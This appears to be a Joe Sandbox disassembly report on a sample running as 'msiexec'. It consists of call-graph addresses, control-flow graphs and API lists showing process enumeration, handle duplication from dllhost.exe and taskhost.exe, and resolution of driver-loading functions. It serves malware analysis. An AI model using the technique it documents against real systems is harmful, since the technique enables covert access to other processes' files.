API calls 39753->39911 39755 43b5cf 39912 42c02e memset 39755->39912 39757 43b005 39757->39652 39761 43b01f 39757->39761 39863 42d836 162 API calls 39757->39863 39758 43b1ef 39873 4233c5 16 API calls 39758->39873 39761->39758 39871 423330 11 API calls 39761->39871 39872 42d71d 162 API calls 39761->39872 39762 43b212 39874 423330 11 API calls 39762->39874 39764 43b087 39864 4233ae 11 API calls 39764->39864 39765 43add4 39765->39706 39913 438f86 16 API calls 39765->39913 39768 43b22a 39875 42ccb5 11 API calls 39768->39875 39771 43b23f 39876 4233ae 11 API calls 39771->39876 39772 43b10f 39867 423330 11 API calls 39772->39867 39774 43b257 39877 4233ae 11 API calls 39774->39877 39778 43b129 39868 4233ae 11 API calls 39778->39868 39779 43b26e 39878 4233ae 11 API calls 39779->39878 39782 43b09a 39782->39772 39865 42cc15 19 API calls 39782->39865 39866 4233ae 11 API calls 39782->39866 39783 43b282 39879 43a87a 162 API calls 39783->39879 39785 43b13c 39869 440f84 12 API calls 39785->39869 39787 43b29d 39880 423330 11 API calls 39787->39880 39790 43b15f 39870 4233ae 11 API calls 39790->39870 39791 43b2af 39792 43b2b8 39791->39792 39793 43b2ce 39791->39793 39881 4233ae 11 API calls 39792->39881 39882 440f84 12 API calls 39793->39882 39797 43b2c9 39884 4233ae 11 API calls 39797->39884 39798 43b2da 39883 42370b memset memcpy memset 39798->39883 39801 43b2f9 39885 423330 11 API calls 39801->39885 39803 43b30b 39886 423330 11 API calls 39803->39886 39805 43b325 39887 423399 11 API calls 39805->39887 39807 43b332 39888 4233ae 11 API calls 39807->39888 39809 43b354 39889 423399 11 API calls 39809->39889 39811 43b364 39890 43a82f 16 API calls 39811->39890 39813 43b370 39891 42db80 162 API calls 39813->39891 39815 43b380 39892 438c4e 162 API calls 39815->39892 39817 43b39e 39893 423399 11 API calls 39817->39893 39819 43b3ae 39894 43a76c 21 API calls 39819->39894 39821 43b3c3 39895 423399 11 API calls 39821->39895 39823->39644 39824->39647 39825->39645 39827 43a6f5 39826->39827 39828 43a765 39826->39828 39827->39828 39915 42a115 39827->39915 39828->39652 39835 4397fd memset 39828->39835 39832 43a73d 39832->39828 39833 42a115 146 API calls 39832->39833 39833->39828 39834->39654 39835->39661 39836->39652 39837->39676 39838->39665 39839->39669 39840->39666 39841->39670 39842->39674 39843->39678 39844->39680 39845->39683 39846->39690 39847->39689 39848->39694 39849->39765 39850->39687 39851->39695 39852->39698 39853->39699 39854->39699 39855->39709 39856->39712 39857->39716 39858->39723 39859->39727 39860->39735 39861->39743 39862->39757 39863->39764 39864->39782 39865->39782 39866->39782 39867->39778 39868->39785 39869->39790 39870->39761 39871->39761 39872->39761 39873->39762 39874->39768 39875->39771 39876->39774 39877->39779 39878->39783 39879->39787 39880->39791 39881->39797 39882->39798 39883->39797 39884->39801 39885->39803 39886->39805 39887->39807 39888->39809 39889->39811 39890->39813 39891->39815 39892->39817 39893->39819 39894->39821 39895->39765 39896->39730 39897->39722 39898->39728 39899->39732 39900->39741 39901->39745 39902->39720 39903->39721 39904->39729 39905->39733 39906->39740 39907->39744 39908->39750 39909->39745 39910->39753 39911->39755 39912->39765 39913->39706 39914->39652 39916 42a175 39915->39916 39918 42a122 39915->39918 39916->39828 39921 42b13b 146 API calls 39916->39921 39918->39916 39919 42a115 146 API calls 39918->39919 39922 43a174 39918->39922 39946 42a0a8 146 API calls 39918->39946 39919->39918 39921->39832 39936 43a196 39922->39936 39937 43a19e 39922->39937 39923 43a306 39923->39936 39966 4388c4 14 API calls 39923->39966 39926 42a115 146 API calls 39926->39937 39928 43a642 39928->39936 39970 4169a7 11 API calls 39928->39970 39932 43a635 39969 42c02e memset 39932->39969 39936->39918 39937->39923 39937->39926 39937->39936 39947 42ff8c 39937->39947 39955 415a91 39937->39955 39959 4165ff 39937->39959 39962 439504 13 API calls 39937->39962 39963 4312d0 146 API calls 39937->39963 39964 42be4c memcpy memcpy memcpy memset memcpy 39937->39964 39965 43a121 11 API calls 39937->39965 39939 42bf4c 14 API calls 39941 43a325 39939->39941 39940 4169a7 11 API calls 39940->39941 39941->39928 39941->39932 39941->39936 39941->39939 39941->39940 39942 42b5b5 memset memcpy 39941->39942 39945 4165ff 11 API calls 39941->39945 39967 42b63e 14 API calls 39941->39967 39968 42bfcf memcpy 39941->39968 39942->39941 39945->39941 39946->39918 39971 43817e 39947->39971 39949 42ff9d 39949->39937 39950 42ff99 39950->39949 39951 42ffe3 39950->39951 39952 42ffd0 39950->39952 39976 4169a7 11 API calls 39951->39976 39975 4169a7 11 API calls 39952->39975 39956 415a9d 39955->39956 39957 415ab3 39956->39957 39958 415aa4 memset 39956->39958 39957->39937 39958->39957 40127 4165a0 39959->40127 39962->39937 39963->39937 39964->39937 39965->39937 39966->39941 39967->39941 39968->39941 39969->39928 39970->39936 39972 438187 39971->39972 39974 438192 39971->39974 39977 4380f6 39972->39977 39974->39950 39975->39949 39976->39949 39979 43811f 39977->39979 39978 438164 39978->39974 39979->39978 39982 437e5e 39979->39982 40005 4300e8 memset memset memcpy 39979->40005 40006 437d3c 39982->40006 39984 437eb3 39984->39979 39985 437ea9 39985->39984 39990 437f22 39985->39990 40021 41f432 39985->40021 39988 437f06 40068 415c56 11 API calls 39988->40068 39992 437f7f 39990->39992 39993 432d4e 3 API calls 39990->39993 39991 437f95 40069 415c56 11 API calls 39991->40069 39992->39991 39994 43802b 39992->39994 39993->39992 39997 4165ff 11 API calls 39994->39997 39996 437fa3 39996->39984 40072 41f638 103 API calls 39996->40072 39998 438054 39997->39998 40032 437371 39998->40032 40001 43806b 40002 438094 40001->40002 40070 42f50e 137 API calls 40001->40070 40002->39996 40071 4300e8 memset memset memcpy 40002->40071 40005->39979 40007 437d69 40006->40007 40010 437d80 40006->40010 40073 437ccb 11 API calls 40007->40073 40009 437d76 40009->39985 40010->40009 40011 437da3 40010->40011 40012 437d90 40010->40012 40014 438460 133 API calls 40011->40014 40012->40009 40077 437ccb 11 API calls 40012->40077 40017 437dcb 40014->40017 40015 437de8 40076 424f26 122 API calls 40015->40076 40017->40015 40074 444283 13 API calls 40017->40074 40019 437dfc 40075 437ccb 11 API calls 40019->40075 40022 41f44f 40021->40022 40023 41f54d 40021->40023 40024 41f466 40022->40024 40030 41f50b 40022->40030 40078 41f1a5 40022->40078 40103 41c06f memcmp 40022->40103 40104 41f3b1 89 API calls 40022->40104 40105 41f398 85 API calls 40022->40105 40023->40024 40107 41c635 memset memset 40023->40107 40024->39988 40024->39990 40030->40023 40030->40024 40106 41c295 85 API calls 40030->40106 40108 41703f 40032->40108 40034 437399 40035 43739d 40034->40035 40037 4373ac 40034->40037 40115 4446ea 11 API calls 40035->40115 40038 416935 16 API calls 40037->40038 40054 4373ca 40038->40054 40039 437584 40041 4375bc 40039->40041 40122 42453e 122 API calls 40039->40122 40040 438460 133 API calls 40040->40054 40123 415c7d 16 API calls 40041->40123 40044 4375d2 40048 4373a7 40044->40048 40124 4442e6 11 API calls 40044->40124 40045 4251c4 136 API calls 40045->40054 40047 4375e2 40047->40048 40125 444283 13 API calls 40047->40125 40048->40001 40050 415a91 memset 40050->40054 40053 43758f 40121 42453e 122 API calls 40053->40121 40054->40039 40054->40040 40054->40045 40054->40050 40054->40053 40067 437d3c 134 API calls 40054->40067 40116 425433 13 API calls 40054->40116 40117 425413 17 API calls 40054->40117 40118 42533e 16 API calls 40054->40118 40119 42538f 16 API calls 40054->40119 40120 42453e 122 API calls 40054->40120 40057 4375f4 40060 437620 40057->40060 40061 43760b 40057->40061 40059 43759f 40062 416935 16 API calls 40059->40062 40064 416935 16 API calls 40060->40064 40126 444283 13 API calls 40061->40126 40062->40039 40064->40048 40066 437612 memcpy 40066->40048 40067->40054 40068->39984 40069->39996 40070->40002 40071->39996 40072->39984 40073->40009 40074->40019 40075->40015 40076->40009 40077->40009 40079 41bc3b 100 API calls 40078->40079 40080 41f1b4 40079->40080 40081 41edad 85 API calls 40080->40081 40088 41f282 40080->40088 40082 41f1cb 40081->40082 40083 41f1f5 memcmp 40082->40083 40084 41f20e 40082->40084 40082->40088 40083->40084 40085 41f21b memcmp 40084->40085 40084->40088 40086 41f326 40085->40086 40089 41f23d 40085->40089 40087 41ee6b 85 API calls 40086->40087 40086->40088 40087->40088 40088->40022 40089->40086 40090 41f28e memcmp 40089->40090 40092 41c8df 55 API calls 40089->40092 40090->40086 40091 41f2a9 40090->40091 40091->40086 40094 41f308 40091->40094 40095 41f2d8 40091->40095 40093 41f269 40092->40093 40093->40086 40096 41f287 40093->40096 40097 41f27a 40093->40097 40094->40086 40101 4446ce 11 API calls 40094->40101 40098 41ee6b 85 API calls 40095->40098 40096->40090 40099 41ee6b 85 API calls 40097->40099 40100 41f2e0 40098->40100 40099->40088 40102 41b1ca memset 40100->40102 40101->40086 40102->40088 40103->40022 40104->40022 40105->40022 40106->40023 40107->40024 40109 417044 40108->40109 40110 41705c 40108->40110 40112 416760 11 API calls 40109->40112 40114 417055 40109->40114 40111 417075 40110->40111 40113 41707a 11 API calls 40110->40113 40111->40034 40112->40114 40113->40109 40114->40034 40115->40048 40116->40054 40117->40054 40118->40054 40119->40054 40120->40054 40121->40059 40122->40041 40123->40044 40124->40047 40125->40057 40126->40066 40132 415cfe 40127->40132 40137 415d23 __aullrem __aulldvrm 40132->40137 40139 41628e 40132->40139 40133 4163ca 40146 416422 11 API calls 40133->40146 40135 416172 memset 40135->40137 40136 416422 10 API calls 40136->40137 40137->40133 40137->40135 40137->40136 40138 415cb9 10 API calls 40137->40138 40137->40139 40138->40137 40140 416520 40139->40140 40141 416527 40140->40141 40145 416574 40140->40145 40143 416544 40141->40143 40141->40145 40147 4156aa 11 API calls 40141->40147 40144 416561 memcpy 40143->40144 40143->40145 40144->40145 40145->39937 40146->40139 40147->40143 40169 41493c EnumResourceNamesW 37548 4287c1 37549 4287d2 37548->37549 37550 429ac1 37548->37550 37551 428818 37549->37551 37552 42881f 37549->37552 37567 425711 37549->37567 37562 425ad6 37550->37562 37618 415c56 11 API calls 37550->37618 37585 42013a 37551->37585 37613 420244 96 API calls 37552->37613 37557 4260dd 37612 424251 119 API calls 37557->37612 37559 4259da 37611 416760 11 API calls 37559->37611 37563 429a4d 37568 429a66 37563->37568 37569 429a9b 37563->37569 37566 422aeb memset memcpy memcpy 37566->37567 37567->37550 37567->37559 37567->37563 37567->37566 37573 4260a1 37567->37573 37581 4259c2 37567->37581 37584 425a38 37567->37584 37601 4227f0 memset memcpy 37567->37601 37602 422b84 15 API calls 37567->37602 37603 422b5d memset memcpy memcpy 37567->37603 37604 422640 13 API calls 37567->37604 37606 4241fc 11 API calls 37567->37606 37607 42413a 89 API calls 37567->37607 37614 415c56 11 API calls 37568->37614 37572 429a96 37569->37572 37616 416760 11 API calls 37569->37616 37617 424251 119 API calls 37572->37617 37610 415c56 11 API calls 37573->37610 37575 429a7a 37615 416760 11 API calls 37575->37615 37581->37562 37605 415c56 11 API calls 37581->37605 37584->37581 37608 422640 13 API calls 37584->37608 37609 4226e0 12 API calls 37584->37609 37586 42014c 37585->37586 37589 420151 37585->37589 37628 41e466 96 API calls 37586->37628 37588 420162 37588->37567 37589->37588 37590 4201b3 37589->37590 37591 420229 37589->37591 37592 4201b8 37590->37592 37593 4201dc 37590->37593 37591->37588 37594 41fd5e 85 API calls 37591->37594 37619 41fbdb 37592->37619 37593->37588 37598 4201ff 37593->37598 37625 41fc4c 37593->37625 37594->37588 37598->37588 37600 42013a 96 API calls 37598->37600 37600->37588 37601->37567 37602->37567 37603->37567 37604->37567 37605->37559 37606->37567 37607->37567 37608->37584 37609->37584 37610->37559 37611->37557 37612->37562 37613->37567 37614->37575 37615->37572 37616->37572 37617->37550 37618->37559 37620 41fbf1 37619->37620 37621 41fbf8 37619->37621 37624 41fc39 37620->37624 37643 4446ce 11 API calls 37620->37643 37633 41ee26 37621->37633 37624->37588 37629 41fd5e 37624->37629 37626 41ee6b 85 API calls 37625->37626 37627 41fc5d 37626->37627 37627->37593 37628->37589 37632 41fd65 37629->37632 37630 41fdab 37630->37588 37631 41fbdb 85 API calls 37631->37632 37632->37630 37632->37631 37634 41ee41 37633->37634 37635 41ee32 37633->37635 37644 41edad 37634->37644 37647 4446ce 11 API calls 37635->37647 37639 41ee3c 37639->37620 37641 41ee58 37641->37639 37649 41ee6b 37641->37649 37643->37624 37653 41be52 37644->37653 37647->37639 37648 41eb85 11 API calls 37648->37641 37650 41ee70 37649->37650 37651 41ee78 37649->37651 37706 41bf99 85 API calls 37650->37706 37651->37639 37654 41be6f 37653->37654 37655 41be5f 37653->37655 37660 41be8c 37654->37660 37685 418c63 memset memset 37654->37685 37684 4446ce 11 API calls 37655->37684 37657 41be69 37657->37639 37657->37648 37660->37657 37661 41bf3a 37660->37661 37662 41bed1 37660->37662 37664 41bee7 37660->37664 37688 4446ce 11 API calls 37661->37688 37665 41bef0 37662->37665 37668 41bee2 37662->37668 37664->37657 37689 41a453 85 API calls 37664->37689 37665->37664 37667 41bf01 37665->37667 37666 41bf24 memset 37666->37657 37667->37666 37670 41bf14 37667->37670 37686 418a6d memset memcpy memset 37667->37686 37674 41ac13 37668->37674 37687 41a223 memset memcpy memset 37670->37687 37673 41bf20 37673->37666 37675 41ac52 37674->37675 37676 41ac3f memset 37674->37676 37678 41ac6a 37675->37678 37690 41dc14 19 API calls 37675->37690 37681 41acd9 37676->37681 37680 41aca1 37678->37680 37691 41519d 37678->37691 37680->37681 37682 41acc0 memset 37680->37682 37683 41accd memcpy 37680->37683 37681->37664 37682->37681 37683->37681 37684->37657 37685->37660 37686->37670 37687->37673 37688->37664 37690->37678 37694 4175ed 37691->37694 37702 417570 SetFilePointer 37694->37702 37697 41760a ReadFile 37698 417637 37697->37698 37699 417627 GetLastError 37697->37699 37700 4151b3 37698->37700 37701 41763e memset 37698->37701 37699->37700 37700->37680 37701->37700 37703 4175b2 37702->37703 37704 41759c GetLastError 37702->37704 37703->37697 37703->37700 37704->37703 37705 4175a8 GetLastError 37704->37705 37705->37703 37706->37651 37707 417bc5 37708 417c61 37707->37708 37709 417bda 37707->37709 37709->37708 37710 417bf6 UnmapViewOfFile CloseHandle 37709->37710 37712 417c2c 37709->37712 37714 4175b7 37709->37714 37710->37709 37710->37710 37712->37709 37719 41851e 18 API calls 37712->37719 37715 4175d6 CloseHandle 37714->37715 37716 4175c8 37715->37716 37717 4175df 37715->37717 37716->37717 37718 4175ce Sleep 37716->37718 37717->37709 37718->37715 37719->37712 39626 4147f3 39629 414561 39626->39629 39628 414813 39630 41456d 39629->39630 39631 41457f GetPrivateProfileIntW 39629->39631 39634 4143f1 memset _itow WritePrivateProfileStringW 39630->39634 39631->39628 39633 41457a 39633->39628 39634->39633

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                              • memset.MSVCRT ref: 0040DF5F
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                              • API String ID: 708747863-3398334509
                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 649 413e79-413e9d call 413959 call 413ca4 643->649 650 413e28-413e35 643->650 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 651 413edb-413ee2 646->651 647->651 663 413ea2-413eae CloseHandle 649->663 654 413e61-413e68 650->654 655 413e37-413e44 GetModuleHandleW 650->655 656 413ee4 651->656 657 413ee7-413efe 651->657 654->649 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->649 663->642
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                              • memset.MSVCRT ref: 00413D7F
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                              • memset.MSVCRT ref: 00413E07
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                              • free.MSVCRT ref: 00413EC1
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 1344430650-1740548384
                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              APIs
                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                              • free.MSVCRT ref: 00418803
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 1355100292-0
                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 6 4455a8-4455e3 memset call 403988 wcsrchr 3->6 7 4457fb 3->7 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 15 4455e5 6->15 16 4455e8-4455f9 6->16 10 445800-445809 7->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 43 445823-445826 14->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 51 445879-44587c 18->51 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 141 44592d-445945 call 40b6ef 24->141 142 44594a 24->142 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->45 46 445b29-445b32 28->46 146 4459d0-4459e8 call 40b6ef 29->146 147 4459ed 29->147 30->21 39 445609-44560d 30->39 31->30 39->21 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->49 40->3 41->40 52 44584c-445854 call 40b1ab 43->52 53 445828 43->53 184 445b08-445b15 call 40ae51 45->184 54 445c7c-445c85 46->54 55 445b38-445b96 memset * 3 46->55 157 445665-445670 call 40b1ab 49->157 158 445643-445663 call 40a9b5 call 4087b3 49->158 67 4458a2-4458aa call 40b1ab 51->67 68 44587e 51->68 52->13 69 44582e-445847 call 40a9b5 call 4087b3 53->69 63 445d1c-445d25 54->63 64 